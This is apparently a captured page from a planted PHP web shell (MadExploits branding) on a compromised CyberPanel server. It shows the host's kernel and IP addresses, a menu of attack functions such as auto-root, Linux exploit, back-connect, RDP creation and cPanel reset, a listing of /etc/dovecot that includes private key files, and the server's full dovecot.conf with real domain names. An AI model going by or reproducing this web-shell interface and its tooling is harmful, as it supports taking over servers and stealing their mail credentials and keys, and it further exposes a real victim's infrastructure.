Linux cyberpanel 5.15.0-156-generic #166-Ubuntu SMP Sat Aug 9 00:02:46 UTC 2025 x86_64
LiteSpeed
: 160.191.175.3 | : 216.73.216.114
Cant Read [ /etc/named.conf ]
8.2.29
aodai6801
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
etc /
dovecot /
[ HOME SHELL ]
Name
Size
Permission
Action
conf.d
[ DIR ]
drwxr-xr-x
private
[ DIR ]
drwx------
cert.pem
1.28
KB
-rw-r--r--
dovecot-dict-auth.conf.ext
1.47
KB
-rw-r-----
dovecot-dict-sql.conf.ext
522
B
-rw-r-----
dovecot-sql.conf.ext
272
B
-rw-r-----
dovecot.conf
1.71
KB
-rw-r--r--
key.pem
1.66
KB
-rw-------
Delete
Unzip
Zip
${this.title}
Close
Code Editor : dovecot.conf
protocols = imap pop3 log_timestamp = "%Y-%m-%d %H:%M:%S " #mail_location = maildir:/home/vmail/%d/%n/Maildir #mail_location = mdbox:/home/vmail/%d/%n/Mdbox ssl_cert = <cert.pem ssl_key = <key.pem mail_plugins = zlib mdbox_rotate_size = 2M namespace { type = private separator = . prefix = INBOX. inbox = yes } service auth { unix_listener auth-master { mode = 0600 user = vmail } unix_listener /var/spool/postfix/private/auth { mode = 0666 user = postfix group = postfix } user = root } service auth-worker { user = root } protocol lda { log_path = /home/vmail/dovecot-deliver.log auth_socket_path = /var/run/dovecot/auth-master postmaster_address = postmaster@example.com mail_plugins = zlib } protocol pop3 { pop3_uidl_format = %08Xu%08Xv mail_plugins = $mail_plugins zlib } protocol imap { mail_plugins = $mail_plugins zlib imap_zlib } passdb { driver = sql args = /etc/dovecot/dovecot-sql.conf.ext } userdb { driver = sql args = /etc/dovecot/dovecot-sql.conf.ext } plugin { zlib_save = gz zlib_save_level = 6 } service stats { unix_listener stats-reader { user = vmail group = vmail mode = 0660 } unix_listener stats-writer { user = vmail group = vmail mode = 0660 } } local_name mail.aodai.devttt.com { ssl_cert = </etc/letsencrypt/live/mail.aodai.devttt.com/fullchain.pem ssl_key = </etc/letsencrypt/live/mail.aodai.devttt.com/privkey.pem } local_name aodai.devttt.com { ssl_cert = </etc/letsencrypt/live/aodai.devttt.com/fullchain.pem ssl_key = </etc/letsencrypt/live/aodai.devttt.com/privkey.pem }
Close